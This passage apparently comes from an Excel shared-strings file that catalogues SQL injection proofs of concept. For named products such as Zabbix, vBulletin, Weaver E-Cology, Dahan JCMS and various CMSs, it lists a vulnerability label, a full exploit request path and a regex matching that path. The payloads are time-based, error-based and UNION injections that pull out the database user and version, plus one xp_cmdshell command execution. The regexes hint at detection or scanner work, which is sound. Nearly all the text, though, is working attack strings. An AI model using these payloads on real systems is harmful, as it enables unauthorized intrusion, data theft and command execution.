  </si>
  <si>
    <t>/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1) and IF(1=1, SLEEP(5), 0) and (1)=(1)</t>
  </si>
  <si>
    <t>.*?(?:/general/approve_center/handle_form\.php\?FORM_VERSION_ID=1%20or%20if\(\(substr\(\(select%20SID%20from%20user_online%20limit%200,1\),25,1\)=binary\(0x3f\)\),\(select%201%2B\~0\),1\)|/general/system/seal_manage/\{\{path1\}\}\?start=|/general/system/seal_manage/\{\{path2\}\}\?DELETE_STR=1|/general/approve_center/handle_form\.php\?FORM_VERSION_ID=1).*</t>
  </si>
  <si>
    <t>/general/approve_center/handle_form.php?FORM_VERSION_ID=1%20or%20if((substr((select%20SID%20from%20user_online%20limit%200,1),25,1)=binary(0x3f)),(select%201%2B~0),1)|/general/system/seal_manage/{{path1}}?start=|/general/system/seal_manage/{{path2}}?DELETE_STR=1|/general/approve_center/handle_form.php?FORM_VERSION_ID=1</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Mobile/Goods/goodsList/id/1/sort_asc/desc,extractvalue\(1,concat\(0x7e,\(select%20md5\(1\)\),0x7e\)\)).*</t>
  </si>
  <si>
    <t>/index.php/Mobile/Goods/goodsList/id/1/sort_asc/desc,extractvalue(1,concat(0x7e,(select%20md5(1)),0x7e))</t>
  </si>
  <si>
    <t>.*?(?:/mobile/index/index2/id/1\)\ and\ \(select\ 1\ from\ \(select\ count\(\*\),concat\(0x716b627671,\(select\ md5\(randomInt\(800000000,\ 1000000000\)\)\),0x716b627671,floor\(rand\(0\)\*2\)\)x\ from\ information_schema\.tables\ group\ by\ x\)a\)\-\-).*</t>
  </si>
  <si>
    <t>/mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5(randomInt(800000000, 1000000000))),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)--</t>
  </si>
  <si>
    <t>Turkish Real Estate Print</t>
  </si>
  <si>
    <t>Turkish Real Estate Print_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/template/default/print\.php\?id=702%27%20AND%20\(SELECT%201040%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(md5\(123\),\(SELECT%20\(ELT\(1040=1040,1\)\)\),md5\(123\),FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)%20AND%20%27TrDc%27=%27TrDc).*</t>
  </si>
  <si>
    <t>/template/default/print.php?id=702%27%20AND%20(SELECT%201040%20FROM(SELECT%20COUNT(*),CONCAT(md5(123),(SELECT%20(ELT(1040=1040,1))),md5(123),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27TrDc%27=%27TrDc</t>
  </si>
  <si>
    <t>.*?(?:/config/fillbacksettingedit\.php\?DontCheckLogin=1\&amp;action=edit\&amp;id=1\+UNION\+ALL\+SELECT\+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL\-\-\+).*</t>
  </si>
  <si>
    <t>Vbulletin Ajaxreg</t>
  </si>
  <si>
    <t>Vbulletin Ajaxreg_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/ajax\.php\?do=inforum\&amp;listforumid=\(select\(0\)from\(select\(sleep\(6\)\)\)v\)/\*'%2B\(select\(0\)from\(select\(sleep\(6\)\)\)v\)%2B'"%2B\(select\(0\)from\(select\(sleep\(6\)\)\)v\)%2B"\*/\&amp;result=10).*</t>
  </si>
  <si>
    <t>/ajax.php?do=inforum&amp;listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&amp;result=10</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyPerView\.jsp\?id=1%20union%20select%201,2,sys\.fn_sqlvarbasetostr\(HashBytes\('MD5','\{\{num\}\}'\)\),4,5,6,7|/Api/portal/elementEcodeAddon/getSqlData\?sql=select%20substring\(sys\.fn_sqlvarbasetostr\(hashbytes\('MD5','\{\{num\}\}'\)\),3,32\)|/Api/portal/elementEcodeAddon/getSqlData\?sql=).*</t>
  </si>
  <si>
    <t>.*?(?:/\?action=data_management\&amp;cpmvc_do_action=mvparse\&amp;f=edit\&amp;id=1%20union%20all%20select%20MD5\(123\),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\#).*</t>
  </si>
  <si>
    <t>/?action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1%20union%20all%20select%20MD5(123),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#</t>
  </si>
  <si>
    <t>.*?(?:/wppg_photogallery/wppg_photo_details/\?gallery_id=1%20UNION%20ALL%20SELECT%20CONCAT\(0x7176787071,0x76576b586376794b756d,0x71707a7171\)\-\-\&amp;image_id=1).*</t>
  </si>
  <si>
    <t>/wppg_photogallery/wppg_photo_details/?gallery_id=1%20UNION%20ALL%20SELECT%20CONCAT(0x7176787071,0x76576b586376794b756d,0x71707a7171)--&amp;image_id=1</t>
  </si>
  <si>
    <t>wordpress_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/wp\-admin/admin\-ajax\.php\?action=submit_nex_form\&amp;nex_forms_Id=1%20and%20sleep\(5\)|/wp\-admin/admin\-ajax\.php\?action=submit_nex_form\&amp;nex_forms_Id=1).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=submit_nex_form&amp;nex_forms_Id=1%20and%20sleep(5)|/wp-admin/admin-ajax.php?action=submit_nex_form&amp;nex_forms_Id=1</t>
  </si>
  <si>
    <t>.*?(?:/api/sms_check\.php\?param=1%27%20and%20updatexml\(1,concat\(0x7e,\(SELECT%20md5\(\{\{num\}\}\)\),0x7e\),1\)\-\-%20).*</t>
  </si>
  <si>
    <t>XYCMS</t>
  </si>
  <si>
    <t>XYCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/news_detail\.asp\?id=\-8301%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CHR\(113\)%26CHR\(120\)%26CHR\(98\)%26CHR\(122\)%26CHR\(113\)%26CHR\(105\)%26CHR\(82\)%26CHR\(102\)%26CHR\(74\)%26CHR\(82\)%26CHR\(65\)%26CHR\(121\)%26CHR\(121\)%26CHR\(115\)%26CHR\(112\)%26CHR\(87\)%26CHR\(104\)%26CHR\(87\)%26CHR\(89\)%26CHR\(112\)%26CHR\(106\)%26CHR\(72\)%26CHR\(107\)%26CHR\(113\)%26CHR\(116\)%26CHR\(90\)%26CHR\(102\)%26CHR\(114\)%26CHR\(86\)%26CHR\(66\)%26CHR\(85\)%26CHR\(103\)%26CHR\(90\)%26CHR\(66\)%26CHR\(75\)%26CHR\(78\)%26CHR\(70\)%26CHR\(78\)%26CHR\(118\)%26CHR\(115\)%26CHR\(99\)%26CHR\(67\)%26CHR\(121\)%26CHR\(114\)%26CHR\(116\)%26CHR\(113\)%26CHR\(122\)%26CHR\(98\)%26CHR\(120\)%26CHR\(113\),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20admin_user%16).*</t>
  </si>
  <si>
    <t>/news_detail.asp?id=-8301%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CHR(113)%26CHR(120)%26CHR(98)%26CHR(122)%26CHR(113)%26CHR(105)%26CHR(82)%26CHR(102)%26CHR(74)%26CHR(82)%26CHR(65)%26CHR(121)%26CHR(121)%26CHR(115)%26CHR(112)%26CHR(87)%26CHR(104)%26CHR(87)%26CHR(89)%26CHR(112)%26CHR(106)%26CHR(72)%26CHR(107)%26CHR(113)%26CHR(116)%26CHR(90)%26CHR(102)%26CHR(114)%26CHR(86)%26CHR(66)%26CHR(85)%26CHR(103)%26CHR(90)%26CHR(66)%26CHR(75)%26CHR(78)%26CHR(70)%26CHR(78)%26CHR(118)%26CHR(115)%26CHR(99)%26CHR(67)%26CHR(121)%26CHR(114)%26CHR(116)%26CHR(113)%26CHR(122)%26CHR(98)%26CHR(120)%26CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20admin_user%16</t>
  </si>
  <si>
    <t>YesWiki_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/\?PagePrincipale/rss\&amp;id=1%27\+and\+extractvalue\(0x0a,concat\(0x0a,\(select\+concat_ws\(0x207c20,md5\(\{\{num\}\}\),1,user\(\)\)\)\)\)\-\-\+\-).*</t>
  </si>
  <si>
    <t>.*?(?:/servlet/imagefield\?key=readimage\&amp;sImgname=password\&amp;sTablename=bbs_admin\&amp;sKeyname=id\&amp;sKeyvalue=\-1';\+\{\{sqlserver\}\}).*</t>
  </si>
  <si>
    <t>/servlet/imagefield?key=readimage&amp;sImgname=password&amp;sTablename=bbs_admin&amp;sKeyname=id&amp;sKeyvalue=-1';+{{sqlserver}}</t>
  </si>
  <si>
    <t>.*?(?:/servlet/imagefield\?key=readimage\&amp;sImgname=password\&amp;sTablename=bbs_admin\&amp;sKeyname=id\&amp;sKeyvalue=\-1';\+\{\{sqlserver\}\}|/portal/pt/task/process\?pageId=login\&amp;id=1\&amp;pluginid=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A1111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL\-\-%20|/portal/pt/task/process\?pageId=login\&amp;id=1\&amp;pluginid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR\(113\)|CHR\(118\)|CHR\(98\)|CHR\(113\)|CHR\(107\)|CHR\(106\)|CHR\(113\),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL\-\-%20).*</t>
  </si>
  <si>
    <t>/servlet/imagefield?key=readimage&amp;sImgname=password&amp;sTablename=bbs_admin&amp;sKeyname=id&amp;sKeyvalue=-1';+{{sqlserver}}|/portal/pt/task/process?pageId=login&amp;id=1&amp;pluginid=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A1111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20|/portal/pt/task/process?pageId=login&amp;id=1&amp;pluginid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)|CHR(118)|CHR(98)|CHR(113)|CHR(107)|CHR(106)|CHR(113),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20</t>
  </si>
  <si>
    <t>.*?(?:/common/dept\.jsp\?deptid=1'\+UNION\+ALL\+SELECT\+60%2Csys\.fn_sqlvarbasetostr\(HASHBYTES\('MD5'%2C'\{\{num\}\}'\)\)\-\-\+).*</t>
  </si>
  <si>
    <t>.*?(?:/bgt/reservationcomplete\.php\?DontCheckLogin=1\&amp;ID=1112';exec%20master\.\.xp_cmdshell%20%27ipconfig%27;'</t>
  </si>
  <si>
    <t>/bgt/reservationcomplete.php?DontCheckLogin=1&amp;ID=1112';exec%20master..xp_cmdshell%20%27ipconfig%27;'|/u8qx/bx_historyDataCheck.jsp</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/common/js/menu/test\.jsp\?doType=101\&amp;S1=\(SELECT%20md5\(\{\{num\}\}\)\)</t>
  </si>
  <si>
    <t>/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20md5({{num}}))|/u8qx/bx_historyDataCheck.jsp</t>
  </si>
  <si>
    <t>云购CMS</t>
  </si>
  <si>
    <t>云购CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/\?/member/cart/Fastpay\&amp;shopid=\-1%20union%20select%20\{\{randstr\}\},2,3,4%20\-\-\+).*</t>
  </si>
  <si>
    <t>/?/member/cart/Fastpay&amp;shopid=-1%20union%20select%20{{randstr}},2,3,4%20--+</t>
  </si>
  <si>
    <t>Zabbix系统</t>
  </si>
  <si>
    <t>Zabbix系统_SQL注入_CVE-2016-10134</t>
  </si>
  <si>
    <t>.*?(?:/jsrpc\.php\?type=0\&amp;mode=1\&amp;method=screen\.get\&amp;profileIdx=web\.item\.graph\&amp;resourcetype=17\&amp;profileIdx2=updatexml\(0,concat\(0xa,md5\(randomInt\(2000000000,\ 2100000000\)\)\),0\)).*</t>
  </si>
  <si>
    <t>/jsrpc.php?type=0&amp;mode=1&amp;method=screen.get&amp;profileIdx=web.item.graph&amp;resourcetype=17&amp;profileIdx2=updatexml(0,concat(0xa,md5(randomInt(2000000000, 2100000000))),0)</t>
  </si>
  <si>
    <t>.*?(?:/admin/cms_channel\.php\?del=123456\+AND\+\(SELECT\+1\+FROM\(SELECT\+COUNT\(\*\)%2cCONCAT\(0x7e%2cmd5\(\{\{num\}\}\)%2c0x7e%2cFLOOR\(RAND\(0\)\*2\)\)x\+FROM\+INFORMATION_SCHEMA\.CHARACTER_SETS\+GROUP\+BY\+x\)a\)\-\-%2b').*</t>
  </si>
  <si>
    <t>.*?(?:/admin/cms_channel\.php\?del=123456\+AND\+\(SELECT\+1\+FROM\(SELECT\+COUNT\(\*\)%2cCONCAT\(0x7e%2cmd5\(202072102\)%2c0x7e%2cFLOOR\(RAND\(0\)\*2\)\)x\+FROM\+INFORMATION_SCHEMA\.CHARACTER_SETS\+GROUP\+BY\+x\)a\)\-\-%2b).*</t>
  </si>
  <si>
    <t>/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b</t>
  </si>
  <si>
    <t>zhilink</t>
  </si>
  <si>
    <t>zhilink_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/adpweb/api/srm/delivery/quickReceiptDetail\?orderBy=1%20AND%20GTID_SUBSET\(CONCAT\(0x7162786b71,\(SELECT%20\(ELT\(3060=3060,1\)\)\),0x7176787671\),3060\)).*</t>
  </si>
  <si>
    <t>/adpweb/api/srm/delivery/quickReceiptDetail?orderBy=1%20AND%20GTID_SUBSET(CONCAT(0x7162786b71,(SELECT%20(ELT(3060=3060,1))),0x7176787671),3060)</t>
  </si>
  <si>
    <t>致翔OA</t>
  </si>
  <si>
    <t>致翔OA_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/mainpage/msglog\.aspx\?user=1%27%20and%201=convert\(int,\(select%20sys\.fn_sqlvarbasetostr\(HashBytes\(%27MD5%27,%27127381%27\)\)\)\)\-\-).*</t>
  </si>
  <si>
    <t>畅捷crm 管理系统</t>
  </si>
  <si>
    <t>畅捷crm 管理系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/webservice/get_usedspace\.php\?site_id=\-1%20and%201=2%20union%20all%20select%20\(md5\(123\)\)).*</t>
  </si>
  <si>
    <t>/webservice/get_usedspace.php?site_id=-1%20and%201=2%20union%20all%20select%20(md5(123))</t>
  </si>
  <si>
    <t>大汉 JCMS</t>
  </si>
  <si>
    <t>大汉 JCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/jcms/m_5_e/init/download/downfile\.jsp\?filename=1|/jcms/m_5_e/init/download/downfile\.jsp\?filename=1%27%20AND%203904%3DDBMS_PIPE\.RECEIVE_MESSAGE%28CHR%2880%29%7C%7CCHR%2898%29%7C%7CCHR%2865%29%7C%7CCHR%2881%29%2C5%29%20AND%20%27tMgk%27%3D%27tMgk).*</t>
  </si>
  <si>
    <t>/jcms/m_5_e/init/download/downfile.jsp?filename=1|/jcms/m_5_e/init/download/downfile.jsp?filename=1%27%20AND%203904%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2880%29%7C%7CCHR%2898%29%7C%7CCHR%2865%29%7C%7CCHR%2881%29%2C5%29%20AND%20%27tMgk%27%3D%27tMgk</t>
  </si>
  <si>
    <t>.*?(?:/module/sitesearch/index\.jsp\?columnid=0%29%20AND%204351%3DDBMS_PIPE\.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2873%29%7C%7CCHR%2898%29%7C%7CCHR%2870%29%2C7%29%20AND%20%281%3D1).*</t>
  </si>
  <si>
    <t>/module/sitesearch/index.jsp?columnid=0%29%20AND%204351%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2873%29%7C%7CCHR%2898%29%7C%7CCHR%2870%29%2C7%29%20AND%20%281%3D1</t>
  </si>
  <si>
    <t>.*?(?:/lm/front/api/opr_datacall\.jsp\?fn_billstatus=E\&amp;vc_id=1|/lm/front/api/opr_datacall\.jsp\?fn_billstatus=E\&amp;vc_id=1%27%20AND%204683=DBMS_PIPE\.RECEIVE_MESSAGE\(CHR\(120\)|CHR\(104\)|CHR\(119\)|CHR\(98\),5\)%20AND%20%27OxYZ%27=%27OxYZ).*</t>
  </si>
  <si>
    <t>/lm/front/api/opr_datacall.jsp?fn_billstatus=E&amp;vc_id=1|/lm/front/api/opr_datacall.jsp?fn_billstatus=E&amp;vc_id=1%27%20AND%204683=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)|CHR(104)|CHR(119)|CHR(98),5)%20AND%20%27OxYZ%27=%27OxYZ</t>
  </si>
  <si>
    <t>.*?(?:/jcms/m_5_d/opr_wap_col\.jsp\?fn_billstatus=D\&amp;strid=1%29%20AND%209054%3DDBMS_PIPE\.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2887%29%7C%7CCHR%2878%29%7C%7CCHR%2875%29%2C5%29%20AND%20%289211%3D9211).*</t>
  </si>
  <si>
    <t>/jcms/m_5_d/opr_wap_col.jsp?fn_billstatus=D&amp;strid=1%29%20AND%209054%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2887%29%7C%7CCHR%2878%29%7C%7CCHR%2875%29%2C5%29%20AND%20%289211%3D9211</t>
  </si>
  <si>
    <t>.*?(?:/jcms/workflow/sys/que_dictionary\.jsp\?que_keywords1=\-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27b|/jcms/workflow/sys/que_dictionary\.jsp\?que_keywords1=\-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27a).*</t>
  </si>
  <si>
    <t>/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27b|/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27a</t>
  </si>
  <si>
    <t>.*?(?:/jcms/short_message/que_recemsg\.jsp\?que_keywords=1\&amp;loginid=a%27%20AND%201111%3DDBMS_PIPE\.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%2885%29%7C%7CCHR%2899%29%7C%7CCHR%28109%29%2C5%29%20AND%20%27a%27%3D%27a).*</t>
  </si>
  <si>
    <t>/jcms/short_message/que_recemsg.jsp?que_keywords=1&amp;loginid=a%27%20AND%201111%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%2885%29%7C%7CCHR%2899%29%7C%7CCHR%28109%29%2C5%29%20AND%20%27a%27%3D%27a|/jcms/short_message/que_recemsg.jsp?que_keywords=1&amp;loginid=a</t>
  </si>
  <si>
    <t>.*?(?:/jcms/workflow/objectbox/selectx_list\.jsp\?id=1%27%20union%20select%20NULL%2CCHR%28126%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%7C%7CNVL%28CAST%28USER%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%20from%20dual\-\-%20\-).*</t>
  </si>
  <si>
    <t>/jcms/workflow/objectbox/selectx_list.jsp?id=1%27%20union%20select%20NULL%2CCHR%28126%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%7C%7CNVL%28CAST%28USER%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%7C%7CCHR%28126%29%20from%20dual--%20-</t>
  </si>
  <si>
    <t>.*?(?:/jcms/short_message/opr_domsg\.jsp\?fn=DA\&amp;i_id=1|/jcms/short_message/opr_domsg\.jsp\?fn=DA\&amp;i_id=1%29%20AND%205639%3DDBMS_PIPE\.RECEIVE_MESSAGE%28CHR%2880%29%7C%7CCHR%2888%29%7C%7CCHR%2869%29%7C%7CCHR%28106%29%2C5%29%20AND%20%289259%3D9259).*</t>
  </si>
  <si>
    <t>/jcms/short_message/opr_domsg.jsp?fn=DA&amp;i_id=1|/jcms/short_message/opr_domsg.jsp?fn=DA&amp;i_id=1%29%20AND%205639%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2880%29%7C%7CCHR%2888%29%7C%7CCHR%2869%29%7C%7CCHR%28106%29%2C5%29%20AND%20%289259%3D9259</t>
  </si>
  <si>
    <t>大汉 VC接口</t>
  </si>
  <si>
    <t>大汉 VC接口_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/vc/vc/interface/styletop/coltop_interface\.jsp\?i_id=\{\{rand_int\(1,10\)\}\}%20and%201=1|/vc/vc/interface/styletop/coltop_interface\.jsp\?i_id=\{\{rand_int\(1,10\)\}\}%20and%201=2).*</t>
  </si>
  <si>
    <t>/vc/vc/interface/styletop/coltop_interface.jsp?i_id={{rand_int(1,10)}}%20and%201=1|/vc/vc/interface/styletop/coltop_interface.jsp?i_id={{rand_int(1,10)}}%20and%201=2</t>
  </si>
  <si>
    <t>.*?(?:/vc/vc/interface/index/que_style_coltop\.jsp\?webid=\{\{rand_int\(1,10\)\}\}%20and%201=1|/vc/vc/interface/index/que_style_coltop\.jsp\?webid=\{\{rand_int\(1,10\)\}\}%20and%201=2).*</t>
  </si>
  <si>
    <t>/vc/vc/interface/index/que_style_coltop.jsp?webid={{rand_int(1,10)}}%20and%201=1|/vc/vc/interface/index/que_style_coltop.jsp?webid={{rand_int(1,10)}}%20and%201=2</t>
  </si>
  <si>
    <t>.*?(?:/vc/vc/interface/styletop/arttop_interface\.jsp\?i_id=\{\{rand_int\(1,\ 10\)\}\}%20and%201=2|/vc/vc/interface/styletop/arttop_interface\.jsp\?i_id=\{\{rand_int\(1,\ 10\)\}\}%20and%201=1).*</t>
  </si>
  <si>
    <t>/vc/vc/interface/styletop/arttop_interface.jsp?i_id={{rand_int(1, 10)}}%20and%201=2|/vc/vc/interface/styletop/arttop_interface.jsp?i_id={{rand_int(1, 10)}}%20and%201=1</t>
  </si>
  <si>
    <t>.*?(?:/jcms/workflow/sys/que_dictionary\.jsp\?que_keywords1=\-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27a|/jcms/workflow/sys/que_dictionary\.jsp\?que_keywords1=\-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27b).*</t>
  </si>
  <si>
    <t>/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27a|/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=-1%27%20OR%201%3D1%20AND%20%27a%27%3D%27b</t>
  </si>
  <si>
    <t>.*?(?:/jcms/jcms_files/jcms1/web1/site/module/sitesearch/opr_classajax\.jsp\?classid=11%20UNION%20ALL%20SELECT%20NULL,CHR\(113\)|CHR\(122\)|CHR\(113\)|CHR\(106\)|CHR\(78\)|CHR\(89\)|CHR\(99\)|CHR\(76\)|CHR\(117\)|CHR\(72\)|CHR\(100\)|CHR\(80\)|CHR\(107\)|CHR\(118\)|CHR\(113\)%20FROM%20DUAL\-\-).*</t>
  </si>
  <si>
    <t>/jcms/jcms_files/jcms1/web1/site/module/sitesearch/opr_classajax.jsp?classid=11%20UNION%20ALL%20SELECT%20NULL,CHR(113)|CHR(122)|CHR(113)|CHR(106)|CHR(78)|CHR(89)|CHR(99)|CHR(76)|CHR(117)|CHR(72)|CHR(100)|CHR(80)|CHR(107)|CHR(118)|CHR(113)%20FROM%20DUAL--</t>
  </si>
  <si>
    <t>大汉</t>
  </si>
  <si>
    <t>大汉_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/vc/vc/style/opr_copycode\.jsp\?id=\-1%20or%201%3D1|/vc/vc/style/opr_copycode\.jsp\?id=\-1%20or%201%3D2).*</t>
  </si>
  <si>
    <t>/vc/vc/style/opr_copycode.jsp?id=-1%20or%201%3D1|/vc/vc/style/opr_copycode.jsp?id=-1%20or%201%3D2</t>
  </si>
  <si>
    <t>大汉网络</t>
  </si>
  <si>
    <t>大汉网络_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/vc/vc/style/opr_copycode\.jsp\?id=\-1%20or%201%3D2|/vc/vc/style/opr_copycode\.jsp\?id=\-1%20or%201%3D1).*</t>
  </si>
  <si>
    <t>/vc/vc/style/opr_copycode.jsp?id=-1%20or%201%3D2|/vc/vc/style/opr_copycode.jsp?id=-1%20or%201%3D1</t>
  </si>
  <si>
    <t>.*?(?:/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B"orderBy":"1%20and%201=updatexml\(1,concat\(0x7e,\(select%20md5\(10086\)\),0x7e\),1\)\-\-"%7D/extend/%7B%7D).*</t>
  </si>
  <si>
    <t>/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B"orderBy":"1%20and%201=updatexml(1,concat(0x7e,(select%20md5(10086)),0x7e),1)--"%7D/extend/%7B%7D</t>
  </si>
  <si>
    <t>德韵网络科技有限公司建站系统</t>
  </si>
  <si>
    <t>德韵网络科技有限公司建站系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/news_show\.php\?id=\-%27/\*!union/\*!select/\*!1,2,3,md5\(123\),5,6,7,8,9,10,11,12,13,14,15\*/\-\-%20\-).*</t>
  </si>
  <si>
    <t>/news_show.php?id=-%27/*!union/*!select/*!1,2,3,md5(123),5,6,7,8,9,10,11,12,13,14,15*/--%20-</t>
  </si>
  <si>
    <t>帝国CMS</t>
  </si>
  <si>
    <t>帝国CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/ikaimi/rolling/list\.php\?line=10\&amp;page=\&amp;classid=10\)%20UNION%20ALL%20SELECT%20CONCAT\(0x71786a7171,md5\(123\),0x716a6b6b71\),NULL,NULL,NULL,NULL\-\-\+\-).*</t>
  </si>
  <si>
    <t>/ikaimi/rolling/list.php?line=10&amp;page=&amp;classid=10)%20UNION%20ALL%20SELECT%20CONCAT(0x71786a7171,md5(123),0x716a6b6b71),NULL,NULL,NULL,NULL--+-</t>
  </si>
  <si>
    <t>.*?(?:/pf/rate\.php\?id=\-1\+UNION\+ALL\+SELECT\+NULL,CONCAT\(0x23,md5\(123\),0x23\)\-\-\+\-).*</t>
  </si>
  <si>
    <t>/pf/rate.php?id=-1+UNION+ALL+SELECT+NULL,CONCAT(0x23,md5(123),0x23)--+-</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyPerEdit 注入</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyPerEdit 注入_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyPerEdit\.jsp\?id=1%20union%20select%201%2C2%2C3%2Csys\.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7).*</t>
  </si>
  <si>
    <t>/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyPerView</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyPerView_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyPerView\.jsp\?id=1%20union%20select%201%2C2%2C3%2Csys\.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7).*</t>
  </si>
  <si>
    <t>/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyWorkEdit</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyWorkEdit_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyWorkEdit\.jsp\?id=1%20union%20select%201%2C2%2C3%2Csys\.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7).*</t>
  </si>
  <si>
